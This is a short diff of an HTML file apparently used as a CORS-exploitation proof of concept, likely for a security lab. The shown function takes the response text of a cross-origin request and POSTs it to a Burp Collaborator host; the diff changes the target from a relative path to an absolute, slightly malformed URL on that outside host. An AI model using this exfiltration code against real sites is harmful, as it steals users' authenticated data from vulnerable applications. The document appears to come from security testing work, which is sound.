--- a/cors.html
+++ b/cors.html
@@ -19,7 +19,7 @@
 
         function handleResponse() {
             var changeReq = new XMLHttpRequest();
-            changeReq.open('post', '/vbacw6hbmdwzi53t4g5t5lqnbeh55u.burpcollaborator.net', true);
+            changeReq.open('post', 'http:\/\//vbacw6hbmdwzi53t4g5t5lqnbeh55u.burpcollaborator.net', true);
             changeReq.send(this.responseText)
         };
 
